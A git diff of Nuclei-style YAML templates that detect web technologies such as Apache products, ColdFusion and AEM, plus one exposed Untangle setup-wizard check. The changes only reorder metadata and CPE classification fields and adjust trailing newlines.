b/http/misconfiguration/untangle-admin-setup.yaml index 9ffc666929..463ecf735f 100644 --- a/http/misconfiguration/untangle-admin-setup.yaml +++ b/http/misconfiguration/untangle-admin-setup.yaml @@ -5,17 +5,17 @@ info: author: ritikchaddha severity: medium description: Untangle Exposed Admin Signup is exposed publicly. + classification: + cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: untangle + product: ng_firewall shodan-query: title:"Setup Wizard" html:"untangle" fofa-query: title="Setup Wizard" && "untangle" - product: ng_firewall - vendor: untangle tags: misconfig,untangle,admin,setup - classification: - cpe: cpe:2.3:a:untangle:ng_firewall:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/4D-detect.yaml b/http/technologies/4D-detect.yaml index 1c1b41754a..c9dbd7b168 100644 --- a/http/technologies/4D-detect.yaml +++ b/http/technologies/4D-detect.yaml @@ -9,16 +9,16 @@ info: - https://us.4d.com/ - https://doc.4d.com/4Dv18/4D/18.4/URLs-and-Form-Actions.300-5232844.en.html - https://doc.4d.com/4Dv18/4D/18.4/Information-about-the-Web-Site.300-5232828.en.html + classification: + cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"4DACTION/" - product: 4d vendor: 4d + product: 4d + shodan-query: http.html:"4DACTION/" tags: 4D,detect,tech - classification: - cpe: cpe:2.3:a:4d:4d:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,6 +26,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -48,4 +49,5 @@ http: group: 1 regex: - 'Server:\s+4D(?:_V[0-9]+)?/([0-9.]+)' -# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100f7a8acd9ea27d789dfe331eff80913f64f9ee6fe84c386fab6035b8ea0fa2bb602210091d93c4de5b4d1c943d244e07faf8403d8c4b2b59c5716ca5810cb9987ca6384:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/activecollab-detect.yaml b/http/technologies/activecollab-detect.yaml index 40a67a5a6a..eb1a3e34dc 100644 --- a/http/technologies/activecollab-detect.yaml +++ b/http/technologies/activecollab-detect.yaml @@ -4,15 +4,15 @@ info: name: activecollab detect author: ffffffff0x severity: info - metadata: - max-request: 1 - fofa-query: app="ActiveCollab" - product: activecollab - vendor: activecollab - tags: acsoft,tech,activecollab - classification: cpe: cpe:2.3:a:activecollab:activecollab:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: activecollab + product: activecollab + fofa-query: app="ActiveCollab" + tags: acsoft,tech,activecollab + http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 200 -# digest: 4a0a00473045022100ea47b3b162a1f01eb7259bbf6552c95dfb369a2715f277d72e0f1489f97afe5c022040e3a919596d8f1ef0f0e07cb26ad7c75167b11686f2f6df8744116e2731f8b7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ea47b3b162a1f01eb7259bbf6552c95dfb369a2715f277d72e0f1489f97afe5c022040e3a919596d8f1ef0f0e07cb26ad7c75167b11686f2f6df8744116e2731f8b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/adobe/adobe-coldfusion-detect.yaml b/http/technologies/adobe/adobe-coldfusion-detect.yaml index 44c32cbc88..c0752d49e3 100644 --- a/http/technologies/adobe/adobe-coldfusion-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-detect.yaml @@ -5,16 +5,16 @@ info: author: philippedelteil severity: info description: With this template we can detect the version number of Coldfusion instances based on their logos. + classification: + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 6 - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,tech - classification: - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -69,4 +69,4 @@ http: dsl: - "status_code==200 && (\"cb594e69af5ba15bca453f76aca53615\" == md5(body))" -# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100faa12701b8bc27ab386795db36e16861a6a66b66d8fb9cd15ac80cb9409141df02205a53027693929221e1489f3e72cf8d72c2b6061ffced415bc66e005548780060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml index 5790db3e1b..066515a218 100644 --- a/http/technologies/adobe/adobe-coldfusion-error-detect.yaml +++ b/http/technologies/adobe/adobe-coldfusion-error-detect.yaml @@ -7,16 +7,16 @@ info: description: With this template we can detect a running ColdFusion instance due to an error page. reference: - https://twitter.com/PhilippeDelteil/status/1418622775829348358 + classification: + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.component:"Adobe ColdFusion" - product: coldfusion vendor: adobe + product: coldfusion + shodan-query: http.component:"Adobe ColdFusion" tags: adobe,coldfusion,tech - classification: - cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* http: - method: GET path: @@ -33,4 +33,4 @@ http: status: - 404 -# digest: 4a0a00473045022068efa69e7486fc3192208ad0e2a27d0f5617cd74743f02d143f7bb64af6556da022100b5540b7df95ff7b71b3394a2f63ddd5e42d5473d8c6febd42195b9fa73496c27:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022068efa69e7486fc3192208ad0e2a27d0f5617cd74743f02d143f7bb64af6556da022100b5540b7df95ff7b71b3394a2f63ddd5e42d5473d8c6febd42195b9fa73496c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/aem-detect.yaml b/http/technologies/aem-detect.yaml index f4b0c6a8f5..6fa89414dd 100644 --- a/http/technologies/aem-detect.yaml +++ b/http/technologies/aem-detect.yaml @@ -10,15 +10,15 @@ info: - https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139 - https://github.com/devanshbatham/FavFreak - https://github.com/sansatart/scrapts/blob/master/shodan-favicon-hashes.csv - metadata: - max-request: 1 - shodan-query: http.component:"Adobe Experience Manager" - product: experience_manager - vendor: adobe - tags: aem,favicon,tech,adobe - classification: cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: adobe + product: experience_manager + shodan-query: http.component:"Adobe Experience Manager" + tags: aem,favicon,tech,adobe + http: - method: GET path: @@ -31,4 +31,4 @@ http: dsl: - "status_code==200 && (\"-144483185\" == mmh3(base64_py(body)))" -# digest: 4a0a00473045022068f39108481f480fd1abc9ea59b5a8fc42785b0c16552788ceb812e868142992022100f55fce42c653e5e9470940c5a6fcece538e39f3d5ce14e21d83bd7966e6854f5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022068f39108481f480fd1abc9ea59b5a8fc42785b0c16552788ceb812e868142992022100f55fce42c653e5e9470940c5a6fcece538e39f3d5ce14e21d83bd7966e6854f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/aerocms-detect.yaml b/http/technologies/aerocms-detect.yaml index a3127078cd..816f30c844 100644 --- a/http/technologies/aerocms-detect.yaml +++ b/http/technologies/aerocms-detect.yaml @@ -4,17 +4,17 @@ info: name: AeroCMS Detect author: pikpikcu severity: info + classification: + cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: aerocms_project + product: aerocms shodan-query: title:"AeroCMS" fofa-query: "AeroCMS" - product: aerocms - vendor: aerocms_project tags: tech,aerocms - classification: - cpe: cpe:2.3:a:aerocms_project:aerocms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,4 @@ http: status: - 200 -# digest: 490a004630440220769bdc680a96232f5286c1c3217977ec05dd2460851ecbfd2056fcc34e384ba602204d2754502f218ade0e566b77987019f64aada581026a8abd9f157ccb378d15ae:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220769bdc680a96232f5286c1c3217977ec05dd2460851ecbfd2056fcc34e384ba602204d2754502f218ade0e566b77987019f64aada581026a8abd9f157ccb378d15ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/angular-detect.yaml b/http/technologies/angular-detect.yaml index a918d681a8..9df3523f68 100644 --- a/http/technologies/angular-detect.yaml +++ b/http/technologies/angular-detect.yaml @@ -7,16 +7,16 @@ info: description: Angular is a development platform for building mobile and desktop web applications using Typescript/JavaScript and other languages. reference: - https://github.com/angular/angular + classification: + cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"ng-version=" - product: angular vendor: angular + product: angular + shodan-query: html:"ng-version=" tags: tech,angular - classification: - cpe: cpe:2.3:a:angular:angular:*:*:*:*:node.js:*:*:* http: - method: GET path: @@ -35,4 +35,4 @@ http: regex: - 'ng-version="([0-9.]+)"' -# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/airflow-detect.yaml b/http/technologies/apache/airflow-detect.yaml index 24ff2e4a76..dd19a01edb 100644 --- a/http/technologies/apache/airflow-detect.yaml +++ b/http/technologies/apache/airflow-detect.yaml @@ -4,16 +4,16 @@ info: name: Apache Airflow author: pdteam severity: info + classification: + cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"Apache Airflow" - product: airflow vendor: apache + product: airflow + shodan-query: http.html:"Apache Airflow" tags: tech,apache,airflow,intrusive - classification: - cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 404 -# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100ed59cfb6802724e34fa5894563277a64889f3676ae6cdae4875a59bfd9e5366a02207589bb03b56a052916e5db355e492f5168909e2051039e97f66022052d90d590:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-answer-detect.yaml b/http/technologies/apache/apache-answer-detect.yaml index c6348a58f6..6f3d8b00b6 100644 --- a/http/technologies/apache/apache-answer-detect.yaml +++ b/http/technologies/apache/apache-answer-detect.yaml @@ -8,17 +8,17 @@ info: Detects Apache Answer version through API endpoit reference: - https://answer.apache.org/ + classification: + cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: apache + product: answer shodan-query: http.favicon.hash:523757057 fofa-query: icon_hash="523757057" - product: answer - vendor: apache tags: detect,tech,apache - classification: - cpe: cpe:2.3:a:apache:answer:*:*:*:*:*:*:*:* http: - method: GET path: @@ -46,4 +46,5 @@ http: name: version regex: - '"version":"([^"]+)"' -# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009e8fd14022f6b92bd8f4859cea0b49820934628bc139239ba58c7c4f268a0bf6022064c229196be4da31c1f58e14368f395bf82afcd2e8679e584116bfd400b2dd2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-axis-detect.yaml b/http/technologies/apache/apache-axis-detect.yaml index 1cdab8933b..25138eff1d 100644 --- a/http/technologies/apache/apache-axis-detect.yaml +++ b/http/technologies/apache/apache-axis-detect.yaml @@ -5,16 +5,16 @@ info: author: dogasantos severity: info description: Axis and Axis2 detection + classification: + cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 - shodan-query: http.html:"Apache Axis" - product: axis vendor: apache + product: axis + shodan-query: http.html:"Apache Axis" tags: tech,axis2,middleware,apache - classification: - cpe: cpe:2.3:a:apache:axis:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,4 @@ http: status: - 200 -# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c038a9ca3babbe0905c9228f2f6a32ccfc217541f7d6d7fa56694398d76d0936022100afe6237444b76f388682bc2b0beeaa1134ac39be09dcc255402add222228036b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-cloudstack-detect.yaml b/http/technologies/apache/apache-cloudstack-detect.yaml index 2e168fbf59..02ee5c221d 100644 --- a/http/technologies/apache/apache-cloudstack-detect.yaml +++ b/http/technologies/apache/apache-cloudstack-detect.yaml @@ -5,20 +5,21 @@ info: author: pussycat0x severity: info description: CloudStack is open-source Infrastructure-as-a-Service cloud computing software for creating, managing, and deploying infrastructure cloud services. It uses existing hypervisor platforms for virtualization, such as KVM, VMware vSphere, including ESXi and vCenter, XenServer/XCP and XCP-ng. - metadata: - shodan-query: http.title:"Apache CloudStack" - product: cloudstack - vendor: apache - tags: tech,apache,cloudstack - classification: cpe: cpe:2.3:a:apache:cloudstack:*:*:*:*:*:*:*:* + metadata: + vendor: apache + product: cloudstack + shodan-query: http.title:"Apache CloudStack" + tags: tech,apache,cloudstack + http: - method: GET path: - "{{BaseURL}}" host-redirects: true + matchers-condition: and matchers: - type: word @@ -29,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220268e39fea1438b8ede541f545337c0c6f6027159cbd433c75bd0f9be63877ea6022100b842369be9a18c54da45a39a9f188c687b365eb23b3869afadd42c22b7dbea08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-cocoon-detect.yaml b/http/technologies/apache/apache-cocoon-detect.yaml index f59e8702da..5ba91e2dd3 100644 --- a/http/technologies/apache/apache-cocoon-detect.yaml +++ b/http/technologies/apache/apache-cocoon-detect.yaml @@ -4,17 +4,17 @@ info: name: Apache Cocoon detect author: ffffffff0x severity: info + classification: + cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: apache + product: cocoon shodan-query: http.html:"Apache Cocoon" fofa-query: app="APACHE-Cocoon" - product: cocoon - vendor: apache tags: apache,cocoon,tech - classification: - cpe: cpe:2.3:a:apache:cocoon:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,4 @@ http: regex: - 'X\-Cocoon\-Version:([ 0-9.]+)' -# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502207c3d5c05569282470766be7f10fec3c51d0b735651fac58a14d156cfe1b9a315022100ac0031c5ee4914905f47336472e3c56e443937e733b2ae348e006042060158f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-dubbo-detect.yaml b/http/technologies/apache/apache-dubbo-detect.yaml index bf2190dd5c..62641fc062 100644 --- a/http/technologies/apache/apache-dubbo-detect.yaml +++ b/http/technologies/apache/apache-dubbo-detect.yaml @@ -4,15 +4,15 @@ info: name: Apache dubbo detect author: ffffffff0x severity: info - metadata: - max-request: 1 - fofa-query: app="APACHE-dubbo" - product: dubbo - vendor: apache - tags: apache,dubbo,tech - classification: cpe: cpe:2.3:a:apache:dubbo:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: dubbo + fofa-query: app="APACHE-dubbo" + tags: apache,dubbo,tech + http: - method: GET path: @@ -24,4 +24,4 @@ http: words: - "Basic realm=\"dubbo\"" -# digest: 490a0046304402207eab0da9fbf6224308f2509f78c874e04fbc4455c9375f51e7ccca501468294b02207f55571310092ba7d00229e95f7779280d0234242c34b50cacc03f5dd7777311:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402207eab0da9fbf6224308f2509f78c874e04fbc4455c9375f51e7ccca501468294b02207f55571310092ba7d00229e95f7779280d0234242c34b50cacc03f5dd7777311:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-karaf-panel.yaml b/http/technologies/apache/apache-karaf-panel.yaml index 106ae8c27a..37f99d8963 100644 --- a/http/technologies/apache/apache-karaf-panel.yaml +++ b/http/technologies/apache/apache-karaf-panel.yaml @@ -4,16 +4,16 @@ info: name: Apache Karaf Detect author: s0obi severity: info + classification: + cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: realm="karaf" - product: karaf vendor: apache + product: karaf + shodan-query: realm="karaf" tags: tech,apache,karaf - classification: - cpe: cpe:2.3:a:apache:karaf:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +25,4 @@ http: words: - 'realm="karaf' -# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502202851728e6494910ea649f13669b2cee5bc1aee43f144efa79b496fac38663c7a022100ad86df88ceee1fed9ec1d6133ad75c0682c93442a1471137e5f4e19d539d8eba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-ofbiz-detect.yaml b/http/technologies/apache/apache-ofbiz-detect.yaml index 3ccf78bbe3..106bfac176 100644 --- a/http/technologies/apache/apache-ofbiz-detect.yaml +++ b/http/technologies/apache/apache-ofbiz-detect.yaml @@ -6,16 +6,16 @@ info: severity: info description: | An Apache OFBiz instance was detected. - metadata: - max-request: 1 - verified: true - fofa-query: app="Apache_OFBiz" - product: ofbiz - vendor: apache - tags: tech,detect,ofbiz,apache - classification: cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: apache + product: ofbiz + fofa-query: app="Apache_OFBiz" + tags: tech,detect,ofbiz,apache + http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502205d30594f5f64af924626e422439a11d6e24629c45c00ae7205f429e2c4abbbaa022100f70e9d73c15c34ebc36d041cc57695a3fca5428b9d23fe32cec394ec9e74f09b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-streampipes-detect.yaml b/http/technologies/apache/apache-streampipes-detect.yaml index 1974ae46c5..e70b9e1b78 100644 --- a/http/technologies/apache/apache-streampipes-detect.yaml +++ b/http/technologies/apache/apache-streampipes-detect.yaml @@ -6,17 +6,17 @@ info: severity: info description: | Checks for the presence of Apache StreamPipes by looking in the body or matching the favicon hash. - metadata: - max-request: 3 - verified: true - shodan-query: title:"apache streampipes" - fofa-query: title="apache streampipes" - product: streampipes - vendor: apache - tags: tech,apache,streampipes,detect - classification: cpe: cpe:2.3:a:apache:streampipes:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + vendor: apache + product: streampipes + shodan-query: title:"apache streampipes" + fofa-query: title="apache streampipes" + tags: tech,apache,streampipes,detect + http: - method: GET path: @@ -27,7 +27,6 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true - matchers: - type: dsl dsl: @@ -41,4 +40,5 @@ http: group: 1 json: - '.info.version' -# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100e844168305f85d35d0d27540e7184cfcac442f22a9422989e405991f0b9574e702205c83386f56fce761314655189f2f551a2b4b82f7929bd3e46ef8b1fc948db36d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-tapestry-detect.yaml b/http/technologies/apache/apache-tapestry-detect.yaml index 9260cad651..7ad62a2675 100644 --- a/http/technologies/apache/apache-tapestry-detect.yaml +++ b/http/technologies/apache/apache-tapestry-detect.yaml @@ -4,15 +4,15 @@ info: name: Apache Tapestry Framework detect author: pikpikcu severity: info - metadata: - max-request: 1 - fofa-query: app="APACHE-Tapestry" - product: tapestry - vendor: apache - tags: apache,tapestry,tech - classification: cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: tapestry + fofa-query: app="APACHE-Tapestry" + tags: apache,tapestry,tech + http: - method: GET path: @@ -41,4 +41,4 @@ http: regex: - 'Tapestry Application Framework, version ([0-9.-A-Z]+)T" \/>' -# digest: 4a0a00473045022021983fb2759fe6b865d1bb63db76a35fa77e2f2cb323d6d0ad05d68d8fd030b0022100ca8e33fb62a8ae0513e3907d4f6ea8ceb7385076ab71b56efa8e93a52ea19e47:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022021983fb2759fe6b865d1bb63db76a35fa77e2f2cb323d6d0ad05d68d8fd030b0022100ca8e33fb62a8ae0513e3907d4f6ea8ceb7385076ab71b56efa8e93a52ea19e47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/apache-zeppelin-detect.yaml b/http/technologies/apache/apache-zeppelin-detect.yaml index 119d24914e..2f3981d312 100644 --- a/http/technologies/apache/apache-zeppelin-detect.yaml +++ b/http/technologies/apache/apache-zeppelin-detect.yaml @@ -4,15 +4,15 @@ info: name: Apache Zeppelin detect author: pikpikcu severity: info - metadata: - max-request: 1 - fofa-query: app="APACHE-Zeppelin" - product: zeppelin - vendor: apache - tags: apache,zeppelin,tech - classification: cpe: cpe:2.3:a:apache:zeppelin:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: zeppelin + fofa-query: app="APACHE-Zeppelin" + tags: apache,zeppelin,tech + http: - method: GET path: @@ -29,4 +29,4 @@ http: status: - 200 -# digest: 4a0a0047304502203d791bc7d1f6b6d9cbe9a33cfa46484720f9ba0bfa4bb3b5232dd6a80d5eb500022100e04a94c4218234a5dbc0e2a68724d6e1a4e2ce226d8f9f816d37a5826b31f147:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203d791bc7d1f6b6d9cbe9a33cfa46484720f9ba0bfa4bb3b5232dd6a80d5eb500022100e04a94c4218234a5dbc0e2a68724d6e1a4e2ce226d8f9f816d37a5826b31f147:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/default-apache-test-all.yaml b/http/technologies/apache/default-apache-test-all.yaml index decf00e308..a367ab8bcd 100644 --- a/http/technologies/apache/default-apache-test-all.yaml +++ b/http/technologies/apache/default-apache-test-all.yaml @@ -5,15 +5,15 @@ info: author: andydoering severity: info description: Detects default installations of apache (not just apache2 or installations on CentOS) - metadata: - max-request: 1 - shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" - product: http_server - vendor: apache - tags: tech,apache - classification: cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: http_server + shodan-query: http.title:"Apache+Default","Apache+HTTP+Server+Test","Apache2+It+works" + tags: tech,apache + http: - method: GET path: @@ -33,4 +33,4 @@ http: kval: - server -# digest: 4a0a0047304502200fad5c3674d892aada569aa8cd26f62f74081302d8ae6278e33cc73673a006b1022100b3a392e383707cfed00858361375d438b1ef75d801ce8637a3400e7eaf500f9a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200fad5c3674d892aada569aa8cd26f62f74081302d8ae6278e33cc73673a006b1022100b3a392e383707cfed00858361375d438b1ef75d801ce8637a3400e7eaf500f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/default-apache-test-page.yaml b/http/technologies/apache/default-apache-test-page.yaml index f9fdc9ae28..abaa3b1022 100644 --- a/http/technologies/apache/default-apache-test-page.yaml +++ b/http/technologies/apache/default-apache-test-page.yaml @@ -4,15 +4,15 @@ info: name: Apache HTTP Server Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" - product: http_server - vendor: apache - tags: tech,apache - classification: cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: http_server + shodan-query: http.title:"Apache HTTP Server Test Page powered by CentOS" + tags: tech,apache + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Apache HTTP Server Test Page powered by CentOS" part: body -# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220467bbb3dc60687ff2f264d427b2bbef67eaf91265d2792c09daa9032b6fa344802204ffb8d5ea0e7243efd0a890758cf097189637da7837623d9d55956ef739fc474:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/default-apache2-page.yaml b/http/technologies/apache/default-apache2-page.yaml index 537a73eccf..39e6cc2220 100644 --- a/http/technologies/apache/default-apache2-page.yaml +++ b/http/technologies/apache/default-apache2-page.yaml @@ -4,15 +4,15 @@ info: name: Apache2 Default Test Page author: dhiyaneshDk severity: info - metadata: - max-request: 1 - shodan-query: http.title:"Apache2 Debian Default Page:" - product: http_server - vendor: apache - tags: tech,apache - classification: cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: apache + product: http_server + shodan-query: http.title:"Apache2 Debian Default Page:" + tags: tech,apache + http: - method: GET path: @@ -24,4 +24,4 @@ http: - "Apache2 Debian Default Page: It works" part: body -# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022068f196b95fc943781824e0eb9e8d05dc3b07394f47ad12d5f5e07ef4606ca0670220205cd739fda4afdbf9e5f3e941db9a05568effa277b7bdf6153112ed2d1fa918:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/apache/ranger-detection.yaml b/http/technologies/apache/ranger-detection.yaml index c68fd1fcfa..4f02d6dc2f 100644 --- a/http/technologies/apache/ranger-detection.yaml +++ b/http/technologies/apache/ranger-detection.yaml @@ -5,15 +5,15 @@ info: author: For3stCo1d severity: info reference: https://github.com/apache/ranger - metadata: - max-request: 2 - shodan-query: http.title:"Ranger - Sign In" - product: ranger - vendor: apache - tags: tech,apache,ranger - classification: cpe: cpe:2.3:a:apache:ranger:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: apache + product: ranger + shodan-query: http.title:"Ranger - Sign In" + tags: tech,apache,ranger + http: - method: GET path: @@ -34,4 +34,4 @@ http: dsl: - "status_code==200 && ('1302629996' == mmh3(base64_py(body)))" -# digest: 4a0a00473045022100c20ddf56af975514e17133890e5c9cab34c0381caaab97a5f5fd94b2a20cad5102203cd2f9263c60fd7d61430687b7c0379123915a783176abd81259dd74a713fe55:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100c20ddf56af975514e17133890e5c9cab34c0381caaab97a5f5fd94b2a20cad5102203cd2f9263c60fd7d61430687b7c0379123915a783176abd81259dd74a713fe55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 